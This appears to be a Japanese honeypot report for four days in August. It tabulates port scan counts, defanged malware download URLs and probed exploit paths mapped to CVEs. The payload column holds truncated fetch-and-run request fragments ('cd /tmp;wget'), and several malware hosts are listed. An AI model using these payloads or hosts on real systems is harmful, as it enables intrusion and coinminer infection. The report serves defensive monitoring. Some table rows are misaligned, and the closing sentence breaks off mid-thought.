Honeypot簡易分析(353-356日目:8/7-8/10)となります。
◾️Honeytrap
※80ポートは除く
<国別検知数および検知数>
<ポート検知数>
|
ポート番号 |
サービス | 件数 |
| 445 | smb | 17099 |
| 23 | telnet | 10956 |
| 5900 | vnc | 3070 |
| 25 | smtp | 670 |
| 2323 | telnet | 575 |
| 3389 | rdp | 564 |
| 3306 | mysql | 490 |
| 8080 | proxy | 329 |
| 9000 | cslistener | 224 |
| 8888 |
ddi-tcp-1 |
223 |
|
ddi-udp-1 |
<新規マルウェアダウンロード>
| malware_download | payload例 |
| hxxp:/\/185[.]35[.]138[.]156/c | GET /shell?cd%20/tmp;wget% |
| hxxp://185[.]244[.]25[.]185/loot/Jaws[.]sh | GET /shell?cd%20/tmp;wget% |
| hxxp://91[.]92[.]66[.]192/curl[.]sh | CNXN............ |
| hxxp:/\/185[.]244[.]25[.]185/loot/Jaws[.]sh | GET /shell?cd%20/tmp;wget% |
| hxxp://23[.]254[.]204[.]46/mips | POST /picsdesc.xml |
| hxxp:/\/91[.]92[.]66[.]192/jaws[.]sh | GET /shell?cd+/tmp;wget |
| hxxp://91[.]92[.]66[.]192/rt[.]sh | POST /wanipcn.xml |
| hxxp:/\/91[.]92[.]66[.]192/quack[.]sh | GET /shell?cd+/tmp;wget |
| hxxp://185[.]62[.]189[.]143/richard | POST /users/%2f/%2fproc%2fself%2fcomm |
| hxxps://gitee[.]com/c-888/ss/raw/master/ss/logo[.]jpg | POST /flex2gateway/amf |
<国別検知数および検知数>
<検知パス一覧>
| wow_path_research | target | CVE | reference | count |
| / | - | - | - | 90 |
| /admin/assets/js/views/login.js | FreePBX | - | https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 | 68 |
| /wls-wsat/CoordinatorPortType | 15 | |||
| /TP/public/index.php | ThinkPHP | - | - | 10 |
| /jsrpc.php | Zabbix | - | - | 8 |
| /zabbix/jsrpc.php | Zabbix | - | - | 8 |
| //recordings/misc/play_page.php | FreePBX FreePBX |
- - |
https://sec23.hatenablog.com/entry/2019/07/24/233000 https://community.freepbx.org/t/incorrect-mime-type-sent-when-playing-voicemail-call-recordings-in-web-browser/16774 |
4 |
| /robots.txt | - | - | - | 4 |
| //recordings/ | FreePBX | - | https://cute-0tter.hatenablog.com/entry/2019/02/25/235730 | 3 |
| //recordings/theme/main.css | 3 | |||
| /index.php | - | - | - | 3 |
| /phpmyadmin/index.php | phpMyAdmin | - | - | 3 |
| /pma/scripts/setup.php | phpMyAdmin | - | - | 3 |
| //hxxpmon.php | Zabbix | - | - | 2 |
| //proxies.php | Zabbix | - | - | 2 |
| /api_jsonrpc.php | Zabbix | - | - | 2 |
| /myadmin/scripts/setup.php | phpMyAdmin | - | - | 2 |
| /phpmyadmin/scripts/setup.php | 2 | |||
| /w00tw00t.at.blackhats.romanian.anti-sec:) | phpMyAdmin | - | - | 2 |
| /zabbix//hxxpmon.php | Zabbix | - | - | 2 |
| /zabbix//proxies.php | Zabbix | - | - | 2 |
| /zabbix/api_jsonrpc.php | Zabbix | - | https://www.exploit-db.com/exploits/39937 | 2 |
| /.aws/credentials | 1 | |||
| /.well-known/security.txt | SSL certificate | - | https://qiita.com/comefigo/items/e9b1bce93c1b615e5934 | 1 |
| /HNAP1 | D-Link DIR-850L | CVE-2015-2051 | https://www.morihi-soc.net/?p=981 | 1 |
| /Main_Analysis_Content.asp | 1 | |||
| /MyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /Nmap/folder/check1565369582 | 1 | |||
| /NmapUpperCheck1565369582 | 1 | |||
| /acadmin.php | Webshell | - | - | 1 |
| /admin-console/login.seam | 1 | |||
| /evox/about | Trane Tracer SC | - | https://mogu2itachi.hatenablog.com/entry/2019/03/10/173327 | 1 |
| /favicon.ico | - | - | - | 1 |
| /images/ | - | - | - | 1 |
| /login.asp | Login Page | - | - | 1 |
| /manager/html | Tomcat | - | - | 1 |
| /mysql/admin/index.php | phpMyAdmin | - | - | 1 |
| /mysql/scripts/setup.php | 1 | |||
| /nmaplowercheck1565369582 | 1 | |||
| /page/maintenance/lanSettings/dns | 1 | |||
| /phpMyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin2/scripts/setup.php | 1 | |||
| /scripts/ajaxPortal.lua | VMware NSX SD-WAN Edge by VeloCloud | CVE-2018-6961 | https://www.exploit-db.com/exploits/44959 | 1 |
| /sdk | Vmware | - | https://github.com/nmap/nmap/blob/master/scripts/vmware-version.nse | 1 |
| /server-status | Apache Server | - | https://github.com/mazen160/server-status_PWN | 1 |
| /sitemap.xml | xml sitemap | - | - | 1 |
| /xmlrpc.php | WordPress | - | - | 1 |
| hxxp://112.124.42.80:63435/ | Unauthorized Relay | - | - | 1 |
<新規検知パス一覧>
| wow_path_research | target | CVE | reference |
| /nmaplowercheck1565369582 | Nmap | - | - |
| /page/maintenance/lanSettings/dns | FLIR Thermal Camera FC-S/PT | - | https://www.exploit-db.com/exploits/42788 |
| /wls-wsat/CoordinatorPortType | Oracle WebLogic Server | CVE-2017-10271 | https://www.morihi-soc.net/?p=910sし |
<マルウェアダウンロード>
| malware | wow_path | count | 参考 |
| hxxp://3389[.]space/lx/ss/logo[.]jpg | /wls-wsat/CoordinatorPortType | 5 | coinminer |
| hxxp://3389[.]space/nw/vm[.]exe | /wls-wsat/CoordinatorPortType | 5 | coinminer |
| hxxp://185[.]164[.]72[.]155/richard | /Main_Analysis_Content.asp | 1 | Downloader |
マルウェアはcoinminer を狙ったものを検知していました。やはり、他の攻撃者を意識してか他のcoinminer 系のプロセスを落としてから
以上となります。
